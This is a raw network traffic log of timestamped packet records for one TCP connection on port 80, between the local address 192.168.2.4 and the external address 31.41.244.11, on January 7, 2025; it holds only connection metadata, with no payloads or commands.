Jan 7, 2025 10:09:05.273871899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273886919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273897886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273901939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.273901939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.273915052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273927927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273940086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273941994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.273966074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274009943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274032116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274035931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274049044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274059057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274070978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274074078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274096966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274101019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274110079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274122000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274132967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274138927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274153948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274223089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274234056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274245977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274255991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274266005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274274111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274274111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274297953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274305105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274316072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274326086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274350882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274363041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274370909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274370909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274384022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274399996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274410009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274414062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274425030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274435043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274467945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274467945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274501085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274513006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274523020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274534941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274539948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274539948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274548054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274565935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274578094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274610043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274610043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274637938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274641991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274650097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274661064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274672985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274682999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274694920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274715900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274760962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274768114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274780989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274807930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274812937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274821043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274832964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274842024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274852037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274852991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274852037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274866104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.274899006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.274899006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306277990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306310892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306348085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306348085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306368113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306370020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306382895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306406021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306411982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306411982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306426048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306435108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306438923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306453943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306454897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306464911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306482077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306493998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306498051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306498051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306505919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306519032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306534052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306544065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306565046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306576967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306581974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306581974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306590080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306602001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306627035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306627035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306632042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306652069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306663990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306677103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306677103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.306710005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306710005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.306742907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.325472116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325486898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325499058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325530052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325541973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325551033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.325553894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325566053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325572014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.325578928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.325614929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.325614929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.325685024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362318039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362330914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362340927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362354040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362370014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362380981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362391949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362401009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362413883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362432957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362447977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362472057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362472057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362531900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362639904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362651110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362659931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362672091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362683058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362692118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362694025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362746000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362746000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362801075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362813950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362823963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362834930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362847090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362848043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362858057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362869978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362894058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362915039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362935066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.362952948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362963915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362974882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.362986088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363003016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363048077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363127947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363140106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363152027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363162994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363168001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363224983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363224983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363287926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363300085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363311052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363327980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363337994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363348961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363363028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363399982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363437891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363451004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.363492012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.363509893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.364794970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.364808083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.364892006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.364985943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.364999056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365009069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365024090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365035057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365041971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365089893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365137100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365149021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365160942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365170956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365179062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365186930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365211964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365221977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365231991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365242004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365243912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365277052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365277052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365319967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365401983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365412951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365423918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365433931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365444899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365454912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365463018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365504980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365504980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365557909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365567923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365578890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365612984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365638971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365716934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365726948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365737915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365756989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365767002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365767956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365775108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365777016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365788937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365828991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365828991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365883112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365895033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365906000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365916014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365921021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365927935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365937948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365951061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365959883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.365962029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.365995884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366033077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366059065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366142035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366185904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366198063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366208076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366219044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366229057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366254091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366254091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366270065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366357088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366368055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366378069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366385937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366396904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366410017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366411924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366420031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366431952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366452932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366486073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366503954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366527081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366539001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366552114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.366583109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.366636038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.394792080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394804001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394814968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394825935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394836903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394846916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394886971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.394917011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.394958019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394969940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394984961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.394996881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395008087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395018101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395029068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395032883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395032883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395040989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395054102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395064116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395097971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395097971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395122051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395170927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395282984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395302057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395318031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395329952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395340919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395342112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395351887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395363092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.395375013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395387888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.395426989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.412200928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412221909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412233114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412265062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412276983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412280083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.412302971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.412311077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412322998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.412338018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.412359953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.412408113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445132971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445149899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445162058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445226908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445298910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445312023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445323944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445336103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445348024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445349932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445382118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445429087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445439100 CET	80	50017	31.41.244.11	192.168.2.4
